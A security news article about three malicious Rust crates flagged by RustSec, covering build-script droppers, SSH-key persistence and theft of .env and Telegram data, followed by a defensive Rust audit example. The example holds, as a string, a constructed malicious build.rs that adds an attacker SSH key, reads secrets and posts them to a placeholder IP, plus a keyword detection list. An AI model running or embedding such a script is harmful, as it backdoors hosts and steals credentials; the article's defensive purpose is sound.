RustSec flags malicious crates, supply-chain threat spans three packages
Three Rust crates were pulled in four days, including one that planted SSH access and stole .env files and Telegram data.

RustSec has flagged three linked crates, pretty-changelog-logger, safe-agent-rs and microsoftsystem64, in a burst that points to a coordinated supply-chain campaign against the Rust ecosystem rather than a one-off bad upload. All three advisories landed on April 15, two days after the crates were reported on April 13, and together they cover packages with 2,239, 4,138 and 6,346 downloads. None had any crates depending on them on crates.io, so whatever pulled them in was a direct dependency or a scanner, not a published crate's dependency tree.
pretty-changelog-logger was the first clear sign of trouble. RustSec said the crate was removed after its build script acted as a loader and dropper for malicious payloads. That placement matters: cargo compiles and runs a crate's build.rs on the developer's machine, with the developer's privileges, as soon as the crate is built as a dependency, before any of its library code is ever called. The package had three versions published on April 8, and Socket.dev was credited with detecting and reporting it to the crates.io team. The name itself was a lure, built to look harmless and useful, which is exactly why maintainers reviewing dependency trees should also read the build scripts those dependencies ship.
safe-agent-rs raised a different red flag. RustSec did not describe it as directly malicious, but said it was owned by the same user as pretty-changelog-logger and microsoftsystem64. It also appeared to imitate another websocket library, a classic pattern in package impersonation. That crate had two versions published on March 24 and 4,138 total downloads, again with no crates depending on it on crates.io.
The most aggressive package was microsoftsystem64. RustSec said it installed a hardcoded SSH authorized_keys entry for persistence, scanned local files including .env data and credential-like JSON names, read their contents, base64-encoded them where needed and exfiltrated the data over HTTP. It also packaged and uploaded Telegram Desktop tdata, a strong indicator of credential and session theft. Socket.dev and sitsh were credited with finding and reporting it. microsoftsystem64 had nine versions published on April 9 and 6,346 downloads.
The larger pattern is what makes this cluster matter. These crates shared ownership, behavior and timing, which points to a deliberate campaign rather than isolated abuse. Rust users have seen this playbook across open-source ecosystems before: impersonate developer tools, get installed during normal workflows and harvest secrets before anyone notices. Socket has said its Contagious Interview research tracked hundreds of malicious npm packages and supporting infrastructure since late 2024, and a contemporaneous disclosure said the same campaign had expanded to crates.io, npm, PyPI, Go modules and Packagist. In practical terms, the warning signs are no longer subtle: lookalike names, build scripts that read files or open network connections unrelated to compiling the crate, sudden bursts of versions from one account, and any package that reaches into credential files long before it ships anything useful. Anyone who built a project containing one of these crates should treat the host as compromised: check ~/.ssh/authorized_keys for an unfamiliar key, rotate whatever was in .env and in credential-like JSON files, and log out and re-authenticate Telegram Desktop sessions. cargo audit, which checks Cargo.lock against the RustSec advisory database, will report the advisories for any project that still lists one of these crates.
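The build-script and lookalike-name checks described above, as an added example that is not code from RustSec, Socket or any crate named in this article. It audits a small inventory of crate names and build.rs sources for the behaviours the advisories describe (an authorized_keys write, .env and tdata reads, base64 plus an HTTP URL) and for names within edit distance 2 of a trusted allowlist. The allowlist, the crate names, both script bodies and the 203.0.113.5 address (documentation range) are constructed for illustration; the "malicious" script is held as a string and is never compiled or run. This is heuristic string matching, easily evaded by obfuscation, and is meant to complement cargo audit and cargo vet rather than replace them.

```rust
// Added example, not code from RustSec, Socket or any crate named on the page:
// a heuristic audit over crate names and build scripts. Every name, path and
// script body below is constructed for illustration.
use std::collections::HashSet;

/// One crate to audit: its name and, if it ships one, the text of its build.rs.
/// cargo compiles and runs build.rs on every machine that builds the crate,
/// which is why a build script is where a dropper hides.
pub struct CrateSource {
    pub name: &'static str,
    pub build_rs: Option<&'static str>,
}

#[derive(Debug, Clone, PartialEq, Eq)]
pub struct Finding {
    pub krate: String,
    pub reason: String,
}

/// Strings a build script has no reason to contain; each maps to a behaviour
/// the advisories describe (SSH persistence, .env/tdata theft, base64 + HTTP).
pub const SUSPICIOUS: &[&str] =
    &["authorized_keys", ".env", "tdata", "base64", "http://", "https://"];

/// Hypothetical allowlist of crates trusted by name; a new dependency within
/// edit distance 2 of one of these is a lookalike candidate.
pub const WELL_KNOWN: &[&str] = &["serde", "tokio", "tungstenite", "reqwest"];

/// Levenshtein distance between two names, computed with two rolling rows.
pub fn edit_distance(a: &str, b: &str) -> usize {
    let a: Vec<char> = a.chars().collect();
    let b: Vec<char> = b.chars().collect();
    let mut prev: Vec<usize> = (0..=b.len()).collect();
    let mut cur = vec![0usize; b.len() + 1];
    for i in 1..=a.len() {
        cur[0] = i;
        for j in 1..=b.len() {
            let cost = usize::from(a[i - 1] != b[j - 1]);
            cur[j] = (prev[j] + 1).min(cur[j - 1] + 1).min(prev[j - 1] + cost);
        }
        std::mem::swap(&mut prev, &mut cur);
    }
    prev[b.len()]
}

/// Flag lookalike names and build scripts showing the advisories' behaviours.
pub fn audit(crates: &[CrateSource], well_known: &[&str]) -> Vec<Finding> {
    let known: HashSet<&str> = well_known.iter().copied().collect();
    let mut out = Vec::new();
    for c in crates {
        let flag = |reason: String| Finding { krate: c.name.to_string(), reason };
        if !known.contains(c.name) {
            for k in well_known {
                if edit_distance(c.name, k) <= 2 {
                    out.push(flag(format!("name is within edit distance 2 of {k}")));
                }
            }
        }
        if let Some(src) = c.build_rs {
            for t in SUSPICIOUS.iter().filter(|t| src.contains(**t)) {
                out.push(flag(format!("build.rs references {t}")));
            }
            // Reading local files plus a URL is the exfiltration shape itself.
            let reads = src.contains("read_to_string") || src.contains("fs::read");
            let net = src.contains("http://") || src.contains("https://");
            if reads && net {
                out.push(flag("build.rs reads local files and contains a URL".into()));
            }
        }
    }
    out
}

/// Constructed build.rs that does only what a build script normally does.
const BENIGN_BUILD_RS: &str = r#"
fn main() {
    println!("cargo:rerun-if-changed=build.rs");
    println!("cargo:rustc-cfg=has_native_backend");
}
"#;

/// Constructed build.rs mimicking the behaviours attributed to microsoftsystem64.
/// It is data here, never compiled or run; 203.0.113.5 is a documentation address.
const MALICIOUS_BUILD_RS: &str = r#"
fn main() {
    let home = std::env::var("HOME").unwrap_or_default();
    let mut keys = std::fs::OpenOptions::new().append(true).create(true)
        .open(format!("{home}/.ssh/authorized_keys")).unwrap();
    std::io::Write::write_all(&mut keys, b"ssh-ed25519 AAAA attacker").unwrap();
    let env = std::fs::read_to_string(".env").unwrap_or_default();
    let _tg = std::fs::read_dir(format!("{home}/TelegramDesktop/tdata"));
    let _ = ureq::post("http://203.0.113.5/upload").send_string(&base64::encode(env));
}
"#;

/// Constructed inventory: a trusted crate, a harmless -sys style crate and a
/// lookalike of tungstenite carrying the malicious script.
pub fn sample_crates() -> Vec<CrateSource> {
    vec![
        CrateSource { name: "serde", build_rs: None },
        CrateSource { name: "example-native-sys", build_rs: Some(BENIGN_BUILD_RS) },
        CrateSource { name: "tungstenit", build_rs: Some(MALICIOUS_BUILD_RS) },
    ]
}

fn main() {
    for f in audit(&sample_crates(), WELL_KNOWN) {
        println!("{}: {}", f.krate, f.reason);
    }
}
```

On a real checkout the inputs would come from the vendored sources under ~/.cargo/registry/src, which keep a crate's build.rs even after it is yanked or removed from crates.io, so the same scan also tells you whether a machine ever fetched one of these packages.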